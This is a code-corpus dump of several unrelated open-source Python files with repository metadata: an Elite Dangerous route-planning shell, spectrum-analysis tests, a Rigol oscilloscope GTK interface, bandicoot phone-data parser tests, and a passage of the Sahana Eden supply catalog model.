ch = logging.StreamHandler(sys.stdout)
ch.setFormatter(formatter)
root.addHandler(ch)
logger = logging.getLogger(__name__)
logger.info('Starting up as app. v{}'.format(pyliteco.version.VERSION))
import argparse
parser = argparse.ArgumentParser("Start the pyliteco program")
parser.add_argument('-c', dest = 'config_file_entered', default = None, metavar = 'Config file')
thread = pyliteco.watchdog.Watchdog_Thread(**vars(parser.parse_args()))
thread.start() | gpl-2.0 | -2,271,374,031,831,028,500 | 35.326087 | 100 | 0.711976 | false |
KayJohnston/jackies-map | edi.py | 1 | 4447 | #!/usr/bin/env python
from __future__ import print_function
import sys
import shlex
import logging
import time
import cmd
import argparse
import traceback
if __name__ == '__main__':
print("Loading environment...")
import env
log = logging.getLogger("edi")
# Now env is loaded, import the apps
import ship
import edts
import close_to
import coords
import distance
import find
import galmath
import fuel_usage
class EDI(cmd.Cmd):
def __init__(self):
# super (EDI, self).__init__()
cmd.Cmd.__init__(self)
self.prompt = "EDI> "
self.state = {}
def run_application(self, ns, args):
try:
args = shlex.split(args)
app = ns.Application(args, True, self.state)
app.run()
except KeyboardInterrupt:
log.debug("Interrupt detected")
pass
except SystemExit:
pass
except Exception as e:
log.error("Error in application: {}".format(e))
log.debug(traceback.format_exc())
pass
return True
def run_help(self, ns):
try:
ns.Application(['-h'], True, self.state).run()
except SystemExit:
pass
return True
#
# Begin commands
#
def help_edts(self):
return self.run_help(edts)
def do_edts(self, args):
return self.run_application(edts, args)
def help_distance(self):
return self.run_help(distance)
def do_distance(self, args):
return self.run_application(distance, args)
def help_raikogram(self):
return self.help_distance()
def do_raikogram(self, args):
return self.do_distance(args)
def help_close_to(self):
return self.run_help(close_to)
def do_close_to(self, args):
return self.run_application(close_to, args)
def help_coords(self):
return self.run_help(coords)
def do_coords(self, args):
return self.run_application(coords, args)
def help_find(self):
return self.run_help(find)
def do_find(self, args):
return self.run_application(find, args)
def help_galmath(self):
return self.run_help(galmath)
def do_galmath(self, args):
return self.run_application(galmath, args)
def help_fuel_usage(self):
return self.run_help(fuel_usage)
def do_fuel_usage(self, args):
return self.run_application(fuel_usage, args)
def help_set_verbosity(self):
print("usage: set_verbosity N")
print("")
print("Set log level (0-3)")
return True
def do_set_verbosity(self, args):
env.set_verbosity(int(args))
return True
def help_set_ship(self):
print("usage: set_ship -m N -t N -f NC [-c N]")
print("")
print("Set the current ship to be used in other commands")
return True
def do_set_ship(self, args):
ap = argparse.ArgumentParser(fromfile_prefix_chars="@", prog = "set_ship")
ap.add_argument("-f", "--fsd", type=str, required=True, help="The ship's frame shift drive in the form 'A6 or '6A'")
ap.add_argument("-m", "--mass", type=float, required=True, help="The ship's unladen mass excluding fuel")
ap.add_argument("-t", "--tank", type=float, required=True, help="The ship's fuel tank size")
ap.add_argument("-c", "--cargo", type=int, default=0, help="The ship's cargo capacity")
try:
argobj = ap.parse_args(shlex.split(args))
except SystemExit:
return True
s = ship.Ship(argobj.fsd, argobj.mass, argobj.tank, argobj.cargo)
self.state['ship'] = s
print("")
print("Ship [FSD: {0}, mass: {1:.1f}T, fuel: {2:.0f}T]: jump range {3:.2f}Ly ({4:.2f}Ly)".format(s.fsd.drive, s.mass, s.tank_size, s.range(), s.max_range()))
print("")
return True
def help_quit(self):
print("Exit this shell by typing \"exit\", \"quit\" or Control-D.")
return True
def do_quit(self, args):
return False
def help_exit(self):
return self.help_quit()
def do_exit(self, args):
return False
#
# End commands
#
def do_EOF(self, args):
print()
return False
def precmd(self, line):
self.start_time = time.time()
return line
def postcmd(self, retval, line):
if retval is False:
return True
log.debug("Command complete, time taken: {0:.4f}s".format(time.time() - self.start_time))
# Prevent EOF showing up in the list of commands
def print_topics(self, header, cmds, cmdlen, maxcol):
if cmds:
cmds = [c for c in cmds if c != "EOF"]
cmd.Cmd.print_topics(self, header, cmds, cmdlen, maxcol)
if __name__ == '__main__':
env.start()
EDI().cmdloop()
env.stop()
| bsd-3-clause | -2,765,339,657,584,099,000 | 22.908602 | 161 | 0.641106 | false |
cokelaer/spectrum | test/test_correlog.py | 1 | 1904 | from spectrum import CORRELOGRAMPSD, CORRELATION, pcorrelogram, marple_data
from spectrum import data_two_freqs
from pylab import log10, plot, savefig, linspace
from numpy.testing import assert_array_almost_equal, assert_almost_equal
def test_correlog():
psd = CORRELOGRAMPSD(marple_data, marple_data, lag=15)
assert_almost_equal(psd[0], 0.138216970)
assert_almost_equal(psd[1000-1], 7.900110787)
assert_almost_equal(psd[2000-1], 0.110103858)
assert_almost_equal(psd[3000-1], 0.222184134)
assert_almost_equal(psd[4000-1], -0.036255277)
assert_almost_equal(psd[4096-1], 0.1391839711)
return psd
def test_correlog_auto_cross():
"""Same as test_correlog but x and y provided"""
psd1 = CORRELOGRAMPSD(marple_data, lag=16)
psd2 = CORRELOGRAMPSD(marple_data, marple_data, lag=16)
assert_array_almost_equal(psd1, psd2)
psd1 = CORRELOGRAMPSD(marple_data, lag=16, correlation_method='CORRELATION')
psd2 = CORRELOGRAMPSD(marple_data, marple_data, lag=16, correlation_method='CORRELATION')
assert_array_almost_equal(psd1, psd2)
def test_correlog_correlation_method():
"""test correlogramPSD playing with method argument"""
psd1 = CORRELOGRAMPSD(marple_data, lag=16, correlation_method='CORRELATION')
psd2 = CORRELOGRAMPSD(marple_data, marple_data, lag=16, correlation_method='xcorr')
assert_array_almost_equal(psd1, psd2)
def test_pcorrelogram_class():
p = pcorrelogram(marple_data, lag=16)
p()
print(p)
p = pcorrelogram(data_two_freqs(), lag=16)
p.plot()
print(p)
def test_CORRELOGRAMPSD_others():
p = CORRELOGRAMPSD(marple_data, marple_data, lag=16, NFFT=None)
def create_figure():
psd = test_correlog()
f = linspace(-0.5, 0.5, len(psd))
psd = cshift(psd, len(psd)/2)
plot(f, 10*log10(psd/max(psd)))
savefig('psd_corr.png')
if __name__ == "__main__":
create_figure()
| bsd-3-clause | -7,416,000,210,789,189,000 | 33.618182 | 93 | 0.697479 | false |
pklaus/PyOscilloskop | gui/rigolUi.py | 1 | 3717 | #!/usr/bin/python
# -*- encoding: UTF8 -*-
# pyOscilloskop
#
# Copyright (19.2.2011) Sascha Brinkmann
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import gtk
import os
from pyoscilloskop import rigolScope
from pyoscilloskop import RigolError
class RigolUI(object):
def __init__(self):
self.builder = gtk.Builder()
self.builder.add_from_file("oscilloskopControl.glade")
self.builder.connect_signals(self)
self.win = self.builder.get_object('window1')
def showOscilloskopInformations(self):
scope = self.scope
builder = self.builder
builder.get_object("labelConnectedToDevice").set_text(scope.getName() + " (" + scope.getDevice() + ")")
builder.get_object("checkChannel1Showchannel").set_active(scope.getChannel1().isChannelActive())
builder.get_object("textChannel1Voltage").set_text(str(scope.getChannel1().getVoltageScale()) + " V/DIV")
builder.get_object("textChannel1Offset").set_text(str(scope.getChannel1().getVoltageOffset()) + " V")
builder.get_object("checkChannel2Showchannel").set_active(scope.getChannel2().isChannelActive())
builder.get_object("textChannel2Voltage").set_text(str(scope.getChannel2().getVoltageScale()) + " V/DIV")
builder.get_object("textChannel2Offset").set_text(str(scope.getChannel2().getVoltageOffset()) + " V")
builder.get_object("textTimeAxisScale").set_text(str(scope.getTimeScale()) + "S/DIV")
builder.get_object("textTimeAxisOffset").set_text(str(scope.getTimescaleOffset()) + " S")
scope.reactivateControlButtons()
def run(self):
try:
self.scope = rigolScope.RigolScope('/dev/ttyUSB0')
## To get more debug output, do:
self.scope.debugLevel = 5
self.win.set_title("Oscilloskope remote control")
self.figureCounter = 1
self.showOscilloskopInformations()
except RigolError as e:
self.info_msg("You have to turn on your scope and connect it to the computer.\n\n%s" % e, gtk.MESSAGE_ERROR)
self.quit()
try:
gtk.main()
except KeyboardInterrupt:
pass
def quit(self):
gtk.main_quit()
def on_window1_delete_event(self, *args):
self.quit()
def info_msg(self, msg, messageType=gtk.MESSAGE_INFO):
dlg = gtk.MessageDialog(parent=self.win, type=messageType, buttons=gtk.BUTTONS_OK, message_format=msg)
dlg.run()
dlg.destroy()
def on_buttonShow_clicked(self, *args):
self.plotFigure()
def plotFigure(self):
print("Plot figure")
parameter = " -p"
if(self.builder.get_object("checkRestartAfterAquring").get_active()):
parameter += " -r"
if(not(self.builder.get_object("checkChannel1Showchannel").get_active())):
parameter += " -1"
if(not(self.builder.get_object("checkChannel2Showchannel").get_active())):
parameter += " -2"
os.system("rigolCli.py " + parameter)
if __name__ == '__main__':
rigolUiApp = RigolUI()
rigolUiApp.run()
| gpl-3.0 | -7,523,303,664,822,341,000 | 36.545455 | 120 | 0.658596 | false |
yvesalexandre/bandicoot | bandicoot/tests/test_parsers.py | 1 | 5328 | # The MIT License (MIT)
#
# Copyright (c) 2015-2016 Massachusetts Institute of Technology.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Test the import of CSV files.
"""
import bandicoot as bc
from bandicoot.core import Record, Position
from datetime import datetime as dt
import unittest
import os
class TestParsers(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls._dir_changed = False
def setUp(self):
if not TestParsers._dir_changed:
abspath = os.path.abspath(__file__)
name = abspath.index(os.path.basename(__file__))
abspath = abspath[:name]
os.chdir(abspath)
TestParsers._dir_changed = True
def test_read_orange(self):
user = bc.io.read_orange("u_test", "samples", describe=False)
self.assertEqual(len(user.records), 500)
def test_read_csv(self):
user = bc.read_csv("u_test2", "samples", describe=False)
self.assertEqual(len(user.records), 500)
def test_read_csv_with_recharges(self):
user = bc.read_csv("A", "samples/manual", describe=False,
recharges_path="samples/manual/recharges")
self.assertEqual(len(user.recharges), 5)
def test_read_csv_antenna_id_no_places(self):
user = bc.read_csv("u_test_antennas", "samples", describe=False)
self.assertEqual(user.records[1],
Record(interaction='call',
direction='in',
correspondent_id='770000001',
datetime=dt(2013, 12, 16, 5, 39, 30),
call_duration=0,
position=Position('13084', None)))
result = {'allweek': {'allday': None}}
radius = bc.spatial.radius_of_gyration(user, groupby=None)
self.assertEqual(radius, result)
def test_read_csv_antenna_id(self):
user = bc.read_csv("u_test_antennas", "samples",
antennas_path="samples/towers.csv", describe=False)
self.assertEqual(user.records[1],
Record(interaction='call',
direction='in',
correspondent_id='770000001',
datetime=dt(2013, 12, 16, 5, 39, 30),
call_duration=0,
position=Position('13084', None)))
radius = bc.spatial.radius_of_gyration(user, groupby=None)
self.assertGreater(radius['allweek']['allday'], 0)
def test_read_csv_no_position(self):
user = bc.read_csv("u_test_no_position", "samples", describe=False)
self.assertEqual(user.records[1],
Record(interaction='call',
direction='in',
correspondent_id='770000001',
datetime=dt(2013, 12, 16, 5, 39, 30),
call_duration=0,
position=Position()))
def test_read_csv_attributes(self):
user = bc.read_csv("u_test2", "samples",
attributes_path="samples/attributes", describe=False)
self.assertEqual(user.attributes, {
'gender': 'male',
'age': '42',
'is_subscriber': 'True',
'individual_id': '7atr8f53fg41'
})
def test_read_duration_format(self):
raw = {
'antenna_id': '11201|11243',
'call_duration': '873',
'correspondent_id': 'A',
'datetime': '2014-06-01 01:00:00',
'direction': 'out',
'interaction': 'call'
}
rv = bc.io._parse_record(raw, duration_format='seconds').call_duration
self.assertEqual(rv, 873)
raw['call_duration'] = '00:14:33'
rv = bc.io._parse_record(raw, duration_format='%H:%M:%S').call_duration
self.assertEqual(rv, 873)
raw['call_duration'] = '1433'
rv = bc.io._parse_record(raw, duration_format='%M%S').call_duration
self.assertEqual(rv, 873)
raw['call_duration'] = ''
rv = bc.io._parse_record(raw, duration_format='seconds').call_duration
self.assertEqual(rv, None)
| mit | 3,988,811,326,115,238,400 | 39.06015 | 80 | 0.579955 | false |
flavour/ifrc_qa | modules/s3db/supply.py | 1 | 104079 | # -*- coding: utf-8 -*-
""" Sahana Eden Supply Model
@copyright: 2009-2016 (c) Sahana Software Foundation
@license: MIT
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
__all__ = ("S3SupplyModel",
"S3SupplyDistributionModel",
"supply_item_rheader",
"supply_item_controller",
"supply_item_entity_controller",
"supply_catalog_rheader",
"supply_item_entity_category",
"supply_item_entity_country",
"supply_item_entity_organisation",
"supply_item_entity_contacts",
"supply_item_entity_status",
"supply_ItemRepresent",
#"supply_ItemCategoryRepresent",
"supply_get_shipping_code",
)
import re
from gluon import *
from gluon.storage import Storage
from ..s3 import *
from s3dal import Row
from s3layouts import S3PopupLink
# @ToDo: Put the most common patterns at the top to optimise
um_patterns = ["\sper\s?(.*)$", # CHOCOLATE, per 100g
#"\((.*)\)$", # OUTWARD REGISTER for shipping (50 sheets)
"([0-9]+\s?(gramm?e?s?|L|g|kg))$", # Navarin de mouton 285 grammes
",\s(kit|pair|btl|bottle|tab|vial)\.?$", # STAMP, IFRC, Englishlue, btl.
"\s(bottle)\.?$", # MINERAL WATER, 1.5L bottle
",\s((bag|box|kit) of .*)\.?$", # (bag, diplomatic) LEAD SEAL, bag of 100
]
# =============================================================================
class S3SupplyModel(S3Model):
"""
Generic Supply functionality such as catalogs and items that is used
across multiple modules.
@ToDo: Break this class up where possible
- is this just supply_item_alt?
"""
names = ("supply_brand",
"supply_catalog",
"supply_item_category",
"supply_item_category_id",
"supply_item",
"supply_item_entity",
"supply_catalog_item",
"supply_item_pack",
"supply_item_alt",
"supply_item_id",
"supply_item_entity_id",
"supply_item_pack_id",
"supply_kit_item",
"supply_item_represent",
"supply_item_category_represent",
"supply_item_add",
"supply_item_pack_quantity",
)
def model(self):
T = current.T
db = current.db
auth = current.auth
s3 = current.response.s3
settings = current.deployment_settings
# Shortcuts
add_components = self.add_components
configure = self.configure
crud_strings = s3.crud_strings
define_table = self.define_table
super_link = self.super_link
float_represent = IS_FLOAT_AMOUNT.represent
NONE = current.messages["NONE"]
format = auth.permission.format
if format == "html":
i18n = {"in_inv": T("in Stock"),
"no_packs": T("No Packs for Item"),
}
s3.js_global.append('''i18n.in_inv="%s"''' % i18n["in_inv"])
s3.js_global.append('''i18n.no_packs="%s"''' % i18n["no_packs"])
# =====================================================================
# Brand
#
tablename = "supply_brand"
define_table(tablename,
Field("name", length=128, notnull=True, unique=True,
label = T("Name"),
requires = [IS_NOT_EMPTY(),
IS_NOT_ONE_OF(db,
"%s.name" % tablename,
),
],
),
s3_comments(),
*s3_meta_fields())
# CRUD strings
ADD_BRAND = T("Create Brand")
crud_strings[tablename] = Storage(
label_create = ADD_BRAND,
title_display = T("Brand Details"),
title_list = T("Brands"),
title_update = T("Edit Brand"),
label_list_button = T("List Brands"),
label_delete_button = T("Delete Brand"),
msg_record_created = T("Brand added"),
msg_record_modified = T("Brand updated"),
msg_record_deleted = T("Brand deleted"),
msg_list_empty = T("No Brands currently registered"))
# Reusable Field
represent = S3Represent(lookup=tablename)
brand_id = S3ReusableField("brand_id", "reference %s" % tablename,
label = T("Brand"),
ondelete = "RESTRICT",
represent = represent,
requires = IS_EMPTY_OR(
IS_ONE_OF(db, "supply_brand.id",
represent,
sort=True)
),
sortby = "name",
comment = S3PopupLink(c = "supply",
f = "brand",
label = ADD_BRAND,
title = T("Brand"),
tooltip = T("The list of Brands are maintained by the Administrators."),
),
)
# =====================================================================
# Catalog (of Items)
#
tablename = "supply_catalog"
define_table(tablename,
Field("name", length=128, notnull=True, unique=True,
label = T("Name"),
requires = [IS_NOT_EMPTY(),
IS_NOT_ONE_OF(db,
"%s.name" % tablename,
),
],
),
self.org_organisation_id(),
s3_comments(),
*s3_meta_fields())
# CRUD strings
ADD_CATALOG = T("Create Catalog")
crud_strings[tablename] = Storage(
label_create = ADD_CATALOG,
title_display = T("Catalog Details"),
title_list = T("Catalogs"),
title_update = T("Edit Catalog"),
label_list_button = T("List Catalogs"),
label_delete_button = T("Delete Catalog"),
msg_record_created = T("Catalog added"),
msg_record_modified = T("Catalog updated"),
msg_record_deleted = T("Catalog deleted"),
msg_list_empty = T("No Catalogs currently registered"))
# Reusable Field
represent = S3Represent(lookup=tablename)
catalog_id = S3ReusableField("catalog_id", "reference %s" % tablename,
default = 1,
label = T("Catalog"),
ondelete = "RESTRICT",
represent = represent,
requires = IS_EMPTY_OR(
IS_ONE_OF(db, "supply_catalog.id",
represent,
sort=True,
# Restrict to catalogs the user can update
updateable=True,
)),
sortby = "name",
comment=S3PopupLink(c = "supply",
f = "catalog",
label = ADD_CATALOG,
title = T("Catalog"),
tooltip = T("The list of Catalogs are maintained by the Administrators."),
),
)
# Components
add_components(tablename,
# Categories
supply_item_category = "catalog_id",
# Catalog Items
supply_catalog_item = "catalog_id",
)
# =====================================================================
# Item Category
#
asset = settings.has_module("asset")
telephone = settings.get_asset_telephones()
vehicle = settings.has_module("vehicle")
item_category_represent = supply_ItemCategoryRepresent()
item_category_represent_nocodes = \
supply_ItemCategoryRepresent(use_code=False)
if format == "xls":
parent_represent = item_category_represent_nocodes
else:
parent_represent = item_category_represent
tablename = "supply_item_category"
define_table(tablename,
catalog_id(),
#Field("level", "integer"),
Field("parent_item_category_id",
"reference supply_item_category",
label = T("Parent"),
ondelete = "RESTRICT",
represent = parent_represent,
),
Field("code", length=16,
label = T("Code"),
#required = True,
),
Field("name", length=128,
label = T("Name"),
),
Field("can_be_asset", "boolean",
default = True,
label = T("Items in Category can be Assets"),
represent = s3_yes_no_represent,
readable = asset,
writable = asset,
),
Field("is_telephone", "boolean",
default = False,
label = T("Items in Category are Telephones"),
represent = s3_yes_no_represent,
readable = telephone,
writable = telephone,
),
Field("is_vehicle", "boolean",
default = False,
label = T("Items in Category are Vehicles"),
represent = s3_yes_no_represent,
readable = vehicle,
writable = vehicle,
),
s3_comments(),
*s3_meta_fields())
# CRUD strings
ADD_ITEM_CATEGORY = T("Create Item Category")
crud_strings[tablename] = Storage(
label_create = ADD_ITEM_CATEGORY,
title_display = T("Item Category Details"),
title_list = T("Item Categories"),
title_update = T("Edit Item Category"),
label_list_button = T("List Item Categories"),
label_delete_button = T("Delete Item Category"),
msg_record_created = T("Item Category added"),
msg_record_modified = T("Item Category updated"),
msg_record_deleted = T("Item Category deleted"),
msg_list_empty = T("No Item Categories currently registered"))
# Reusable Field
item_category_requires = IS_EMPTY_OR(
IS_ONE_OF(db, "supply_item_category.id",
item_category_represent_nocodes,
sort=True)
)
item_category_comment = S3PopupLink(c = "supply",
f = "item_category",
label = ADD_ITEM_CATEGORY,
title = T("Item Category"),
tooltip = ADD_ITEM_CATEGORY,
)
# @todo: make lazy_table
table = db[tablename]
table.parent_item_category_id.requires = item_category_requires
item_category_id = S3ReusableField("item_category_id", "reference %s" % tablename,
comment = item_category_comment,
label = T("Category"),
ondelete = "RESTRICT",
represent = item_category_represent,
requires = item_category_requires,
sortby = "name",
)
item_category_script = '''
$.filterOptionsS3({
'trigger':'catalog_id',
'target':'item_category_id',
'lookupPrefix':'supply',
'lookupResource':'item_category',
})'''
# Components
add_components(tablename,
# Child categories
supply_item_category = "parent_item_category_id",
)
configure(tablename,
deduplicate = self.supply_item_category_duplicate,
onvalidation = self.supply_item_category_onvalidate,
)
# =====================================================================
# Item
#
# These are Template items
# Instances of these become Inventory Items & Request items
#
tablename = "supply_item"
define_table(tablename,
catalog_id(),
# Needed to auto-create a catalog_item
item_category_id(
script = item_category_script
),
Field("name", length=128, notnull=True,
label = T("Name"),
requires = IS_NOT_EMPTY(),
),
Field("code", length=16,
label = T("Code"),
represent = lambda v: v or NONE,
),
Field("um", length=128, notnull=True,
default = "piece",
label = T("Unit of Measure"),
requires = IS_NOT_EMPTY(),
),
brand_id(),
Field("kit", "boolean",
default = False,
label = T("Kit?"),
represent = lambda opt: \
(opt and [T("Yes")] or [NONE])[0],
),
Field("model", length=128,
label = T("Model/Type"),
represent = lambda v: v or NONE,
),
Field("year", "integer",
label = T("Year of Manufacture"),
represent = lambda v: v or NONE,
),
Field("weight", "double",
label = T("Weight (kg)"),
represent = lambda v: \
float_represent(v, precision=2),
),
Field("length", "double",
label = T("Length (m)"),
represent = lambda v: \
float_represent(v, precision=2),
),
Field("width", "double",
label = T("Width (m)"),
represent = lambda v: \
float_represent(v, precision=2),
),
Field("height", "double",
label = T("Height (m)"),
represent = lambda v: \
float_represent(v, precision=2),
),
Field("volume", "double",
label = T("Volume (m3)"),
represent = lambda v: \
float_represent(v, precision=2),
),
# These comments do *not* pull through to an Inventory's Items or a Request's Items
s3_comments(),
*s3_meta_fields())
# Categories in Progress
#table.item_category_id_0.label = T("Category")
#table.item_category_id_1.readable = table.item_category_id_1.writable = False
#table.item_category_id_2.readable = table.item_category_id_2.writable = False
# CRUD strings
ADD_ITEM = T("Create Item")
crud_strings[tablename] = Storage(
label_create = ADD_ITEM,
title_display = T("Item Details"),
title_list = T("Items"),
title_update = T("Edit Item"),
label_list_button = T("List Items"),
label_delete_button = T("Delete Item"),
msg_record_created = T("Item added"),
msg_record_modified = T("Item updated"),
msg_record_deleted = T("Item deleted"),
msg_list_empty = T("No Items currently registered"),
msg_match = T("Matching Items"),
msg_no_match = T("No Matching Items")
)
supply_item_represent = supply_ItemRepresent(show_link=True)
# Reusable Field
supply_item_id = S3ReusableField("item_id",
"reference %s" % tablename, # 'item_id' for backwards-compatibility
label = T("Item"),
ondelete = "RESTRICT",
represent = supply_item_represent,
requires = IS_ONE_OF(db, "supply_item.id",
supply_item_represent,
sort=True),
sortby = "name",
widget = S3AutocompleteWidget("supply", "item"),
comment=S3PopupLink(c = "supply",
f = "item",
label = ADD_ITEM,
title = T("Item"),
tooltip = T("Type the name of an existing catalog item OR Click 'Create Item' to add an item which is not in the catalog."),
),
)
# ---------------------------------------------------------------------
filter_widgets = [
S3TextFilter(["code",
"name",
"model",
#"item_category_id$name",
"comments",
],
label = T("Search"),
comment = T("Search for an item by its code, name, model and/or comment."),
#_class = "filter-search",
),
S3OptionsFilter("brand_id",
# @ToDo: Introspect need for header based on # records
#header = True,
#label = T("Brand"),
represent = "%(name)s",
widget = "multiselect",
),
S3OptionsFilter("year",
comment = T("Search for an item by Year of Manufacture."),
# @ToDo: Introspect need for header based on # records
#header = True,
label = T("Year"),
widget = "multiselect",
),
]
report_options = Storage(defaults=Storage(rows="name",
cols="item_category_id",
fact="count(brand_id)",
),
)
# Default summary
summary = [{"name": "addform",
"common": True,
"widgets": [{"method": "create"}],
},
{"name": "table",
"label": "Table",
"widgets": [{"method": "datatable"}]
},
{"name": "report",
"label": "Report",
"widgets": [{"method": "report",
"ajax_init": True}]
},
]
configure(tablename,
deduplicate = self.supply_item_duplicate,
filter_widgets = filter_widgets,
onaccept = self.supply_item_onaccept,
orderby = "supply_item.name",
report_options = report_options,
summary = summary,
)
# Components
add_components(tablename,
# Catalog Items
supply_catalog_item = "item_id",
# Packs
supply_item_pack = "item_id",
# Inventory Items
inv_inv_item = "item_id",
# Order Items
inv_track_item = "item_id",
# Procurement Plan Items
proc_plan_item = "item_id",
# Request Items
req_req_item = "item_id",
# Supply Kit Items
supply_kit_item = "parent_item_id",
# Supply Kit Items (with link table)
#supply_item = {"name": "kit_item",
# "link": "supply_kit_item",
# "joinby": "parent_item_id",
# "key": "item_id"
# "actuate": "hide",
# },
)
# Optional components
if settings.get_supply_use_alt_name():
add_components(tablename,
# Alternative Items
supply_item_alt="item_id",
)
# =====================================================================
# Catalog Item
#
# This resource is used to link Items with Catalogs (n-to-n)
# Item Categories are also Catalog specific
#
tablename = "supply_catalog_item"
define_table(tablename,
catalog_id(),
item_category_id(
script = item_category_script
),
supply_item_id(script=None), # No Item Pack Filter
s3_comments(), # These comments do *not* pull through to an Inventory's Items or a Request's Items
*s3_meta_fields())
# CRUD strings
crud_strings[tablename] = Storage(
label_create = T("Create Catalog Item"),
title_display = T("Item Catalog Details"),
title_list = T("Catalog Items"),
title_update = T("Edit Catalog Item"),
title_upload = T("Import Catalog Items"),
label_list_button = T("List Catalog Items"),
label_delete_button = T("Delete Catalog Item"),
msg_record_created = T("Catalog Item added"),
msg_record_modified = T("Catalog Item updated"),
msg_record_deleted = T("Catalog Item deleted"),
msg_list_empty = T("No Catalog Items currently registered"),
msg_match = T("Matching Catalog Items"),
msg_no_match = T("No Matching Catalog Items")
)
# Filter Widgets
filter_widgets = [
S3TextFilter([#These lines are causing issues...very slow - perhaps broken
#"comments",
#"item_category_id$code",
#"item_category_id$name",
#"item_id$brand_id$name",
#"item_category_id$parent_item_category_id$code"
#"item_category_id$parent_item_category_id$name"
"item_id$code",
"item_id$name",
"item_id$model",
"item_id$comments"
],
label = T("Search"),
comment = T("Search for an item by its code, name, model and/or comment."),
),
S3OptionsFilter("catalog_id",
label = T("Catalog"),
comment = T("Search for an item by catalog."),
#represent ="%(name)s",
cols = 3,
hidden = True,
),
S3OptionsFilter("item_category_id",
label = T("Category"),
comment = T("Search for an item by category."),
represent = item_category_represent_nocodes,
cols = 3,
hidden = True,
),
S3OptionsFilter("item_id$brand_id",
label = T("Brand"),
comment = T("Search for an item by brand."),
#represent ="%(name)s",
cols = 3,
hidden = True,
),
]
configure(tablename,
deduplicate = self.supply_catalog_item_duplicate,
filter_widgets = filter_widgets,
)
# =====================================================================
# Item Pack
#
# Items can be distributed in different containers
#
tablename = "supply_item_pack"
define_table(tablename,
supply_item_id(empty=False),
Field("name", length=128,
notnull=True, # Ideally this would reference another table for normalising Pack names
default = T("piece"),
label = T("Name"),
requires = IS_NOT_EMPTY(),
),
Field("quantity", "double", notnull=True,
default = 1,
label = T("Quantity"),
represent = lambda v: \
float_represent(v, precision=2),
),
s3_comments(),
*s3_meta_fields())
# CRUD strings
ADD_ITEM_PACK = T("Create Item Pack")
crud_strings[tablename] = Storage(
label_create = ADD_ITEM_PACK,
title_display = T("Item Pack Details"),
title_list = T("Item Packs"),
title_update = T("Edit Item Pack"),
label_list_button = T("List Item Packs"),
label_delete_button = T("Delete Item Pack"),
msg_record_created = T("Item Pack added"),
msg_record_modified = T("Item Pack updated"),
msg_record_deleted = T("Item Pack deleted"),
msg_list_empty = T("No Item Packs currently registered"))
# ---------------------------------------------------------------------
# Reusable Field
item_pack_represent = supply_ItemPackRepresent(lookup="supply_item_pack")
item_pack_id = S3ReusableField("item_pack_id", "reference %s" % tablename,
label = T("Pack"),
ondelete = "RESTRICT",
represent = item_pack_represent,
# Do not display any packs initially
# will be populated by filterOptionsS3
requires = IS_ONE_OF_EMPTY_SELECT(db,
"supply_item_pack.id",
item_pack_represent,
sort=True,
# @ToDo: Enforce "Required" for imports
# @ToDo: Populate based on item_id in controller instead of IS_ONE_OF_EMPTY_SELECT
# filterby = "item_id",
# filter_opts = (....),
),
script = '''
$.filterOptionsS3({
'trigger':'item_id',
'target':'item_pack_id',
'lookupPrefix':'supply',
'lookupResource':'item_pack',
'msgNoRecords':i18n.no_packs,
'fncPrep':S3.supply.fncPrepItem,
'fncRepresent':S3.supply.fncRepresentItem
})''',
sortby = "name",
#comment=S3PopupLink(c = "supply",
# f = "item_pack",
# label = ADD_ITEM_PACK,
# title = T("Item Packs"),
# tooltip = T("The way in which an item is normally distributed"),
# ),
)
configure(tablename,
deduplicate = self.supply_item_pack_duplicate,
)
# Components
add_components(tablename,
# Inventory Items
inv_inv_item = "item_pack_id",
)
# =====================================================================
# Supply Kit Item Table
#
# For defining what items are in a kit
tablename = "supply_kit_item"
define_table(tablename,
supply_item_id("parent_item_id",
label = T("Parent Item"),
comment = None,
),
supply_item_id("item_id",
label = T("Kit Item"),
),
Field("quantity", "double",
label = T("Quantity"),
represent = lambda v: \
float_represent(v, precision=2),
),
item_pack_id(),
s3_comments(),
*s3_meta_fields())
# CRUD strings
crud_strings[tablename] = Storage(
label_create = T("Add Item to Kit"),
title_display = T("Kit Item Details"),
title_list = T("Kit Items"),
